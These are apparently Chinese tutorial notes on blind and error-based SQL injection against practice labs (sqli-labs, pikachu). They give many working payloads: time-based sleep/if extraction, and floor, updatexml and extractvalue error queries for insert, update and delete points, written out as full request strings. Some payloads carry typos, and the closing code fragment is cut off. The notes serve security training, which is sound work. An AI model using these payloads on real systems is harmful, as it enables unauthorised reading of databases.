前言

当进行 SQL 注入时，有很多注入会出现无回显的情况，其中不回显
的原因可能是 SQL 语句查询方式的问题导致，这个时候我们需要用到相
关的报错或盲注进行后续操作，同时作为手工注入时，提前了解或预知其
SQL 语句大概写法也能更好的选择对应的注入语句。

sqlilabs-less5 注入测试（布尔盲注）
sqlilabs-less2 注入测试（延时盲注）
sqlilabs-less46 注入测试（排序盲注）

基础知识

select 查询数据

• 在网站应用中进行数据显示查询操作
• 例：select * from news where id=$id

insert 插入数据

• 在网站应用中进行用户注册添加等操作
• 例：insert into news(id,url,text) values(2,‘x’,’$t’)
• 进行注入的话，我们需要将单引号哈括号进行过滤

delete 删除数据

• 后台管理里面删除文章删除用户等操作
• 例：delete from news where id=$id

update 更新数据

• 会员或后台中心数据同步或缓存等操作
• 例：update user set pwd=’$p’ where id=2 and username=‘admin’

order by 排序数据

• 一般结合表名或列名进行数据排序操作.
• 例：select * from news order by $id
• 例：select id,name,price from news order by $order

注意：

• 重点理解上述查询和网站应用的关系
• 注意注入语句标志符号
• 注册一般是插入操作。删除帖子一般是删除操作。修改信息一般是更新操作等等
• ​ 我们可以通过以上查询方式与网站应用的关系，来猜测注入点产生地方或应用猜测到对方的 SQL 查询方式
  
  • like 'ro%' ————— —— —判断ro或ro...是否成立
  • regexp '^xiaodi[a-z]' — —匹配xiaodi及xiaodi...等
  • if————— — ————— —(条件,5,0) 条件成立返回5反之返回 0
  • sleep(5) ————————— SQL语句延时执行5秒
  • mid(a,b,c) ————————从位置b开始，截取a字符串的 c 位
  • substr(a,b,c) ———————从b位置开始,截取字符串a的 c 长度
  • left(database(),1) left(a,b)-从左侧截取a的前 b 位
  • length(database())=8——— 判断数据库database()名的长度
  • ord=ascii ascii(x)=97——— 判断x的ascii码是否等于 97

SQL注入报错盲注
盲注就是在注入过程中，获取的数据不能回显至前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。我们可以知道盲注分为以下三类:

盲注分为以下三类：

• 基于布尔的sQL盲注-逻辑判断（优选级：2）（工具进行注入）
  
  • regexp,like, ascii,left,ord , mid
  • 注入思想（sqlilabs-less5 注入）
    
    • 由源代码可以知道其没有回显的代码语句
    • 
    • 地址：Less-5 Double Query- Single Quotes- String (tmzo.club)
    • 使用left函数进行尝试，查看一下 version()，数据库的版本号为 5.6.17，这里的语句的意思是看版本号的第一位是 不是 5，明显的返回的结果是正确的。当版本号不正确的时候，则不能正确显示 you are in…
    • 注入语句：?id=1' and left(version(),1)=5 --+
    • 
    • 
• 基于时间的sQL盲注-延时判断
  
  • 通过延迟进而通过加载页面时间来判断猜想是否正确
  • sleep()延时函数
  • 
  • if(a,b,c)条件判断函数，a为判断条件，如果a成立，则执行123，否则执行456
  • 两者联合使用
  • 注入思想（sqlilabs-less2 注入）
    
    • 地址：Less-2 **Error Based- Intiger** (tmzo.club)
    • 先用length(database())猜数据库长度，一个个数进行尝试！
    • 注入语句： ?id=1 and sleep(if(length(database())=8,5,0)) --+
    • 
    • 猜数据库各个字母（这里以首字母为例）
      
      • 方法一：mid函数/substr函数进行首字母的猜测，后面字母也是如此！
      • 注入语句：?id=1 and sleep(if mid(database(),1,1)='s',5,0)) --+
      • 
      • 方法二：ord/ascii函数进行首字母的猜测，后面字母也是如此！(推荐使用！，脚本用数字直接一个for循环即可)
      • 注入语句： ?id=1 and sleep(if(ascii(mid(database()),1,1))=115,5,0)) --+
      • 
    • 猜数据库中表名
      
      • 库中有多个表，如何进行一个个表的猜测？
        
        • 使用 limit 进行表的限定
        • 注入语句： ?id=1 and if(ascill(substr((select table_name from information_schema.tables where table_schema=database() limt 0,1),1,1))=101,sleep(3),0) --+
        • 

• 基于报错的 SQL 盲注-报错回显（优选级：1）

  
  
  • floor，updatexml，extractvalue
  • 相关链接：12种报错注入+万能语句 - 简书 (jianshu.com)
  • 利用floor进行报错回显（在insert情况下）（update与insert都可以）
    
    • 注入语句：' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
      from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
      or '
    • 
  • 利用updatexml进行报错回显（在insert情况下）（update与insert都可以）
    
    • 注入语句：' or updatexml(1,concat(0x7e,(version())),0) or'
    • 
  • 利用extractvalue进行报错回显（在insert情况下）（update与insert都可以）
    
    • 注入代码：' or extractvalue(1,concat(0x7e,database())) or'
    • 
  • 利用floor进行报错回显（在update情况下）（update与insert都可以）
    
    • 注入代码：' or (select 1 from(select
      count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets
      group by x)a) or '
    • 
  • 利用updatexml进行报错回显（在update情况下）
    
    • 注入代码；' or updatexml(1,concat(0x7e,(version())),0) or '
    • 
  • 利用extractvalue进行报错回显（在update情况下）
    
    • 注入代码：' or extractvalue(1,concat(0x7e,database())) or '
    • 
  • 利用floor进行报错回显（在delete情况下）
    
    • 注入代码：?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(da
      tabase()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
    • 
  • 利用updatexml进行报错回显（在delete情况下）
    
    • 注入代码：?id=56+or+updatexml+(1,concat(0x7e,database()),0)
    • 
  • 利用extractvalue进行报错回显（在delete情况下）
    
    • 注入代码：?id=56+or+extractvalue(1,concat(0x7e,database()))
    • 
• 注意：
  
  • 我们可以改变在两个波浪号（0x7e）之间的参数，如最后一个我们能够把database（）改成user（）来获取到他的用户名，以上三种方式都是如此操作！
  • 波浪号的作用：开发工具中用于查找的依据（即会根据夹在波浪号这个条件进行判断，进行查询结果的返回显示）
  • 思考：能不能在其他属性的地方进行注入？
    
    • 存在变量可控、能带入数据库查询、变量未存在过滤和过滤不严谨满足这三种条件即可！
  • 在delete的情况下，如果数据提交方式为get方式，我们需要将空格变成+，防止被转义！

涉及资源：

• Order by排序注入方法小总结：Order by排序注入方法小总结 - 简书 (jianshu.com)
• sap+access源码:https://pan.baidu.com/s/1IX6emxDpvYrVZbQzJbHn3g 提取码：l9f6

注入语句：

报错回显（insert、update、delete）

1.pikachu insert

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or'
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or updatexml(1,concat(0x7e,(version())),0) 
or'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or extractvalue(1,concat(0x7e,database())) 
or'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

2.pikachu update

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

3.pikachu delete

/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)

pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)

/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))

延时盲注：

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+

参考资料：

like ‘ro%’ 判断ro或者ro……是否成立

regexp ‘^xiaodi[a-z]’ 匹配xiaodi以及xiaodi……等

if(条件，5,0) 条件成立 返回5 反之 返回0

sleep(5) 语句延时执行5秒

mid(a,b,c) 从位置b开始，截取a字符串的c位

substr(a,b,c) 从b的位置开始，截取字符串a的c长度

left(database(),1) left(a,b) 左侧a的位置截取前b位

length(database()) = 8 判断数据库名database()名的长度

ord= ascii ascii(x) = 97 判断ascii码是否等于97

代码：

nsert 注入练习-小迪渗透吧
编号：
帐号：
密码：


delete 注入练习-小迪渗透吧
编号：


update 注入练习-小迪渗透吧
帐号：
密码：


';
//insert 代码块
$id=@$_GET['i'];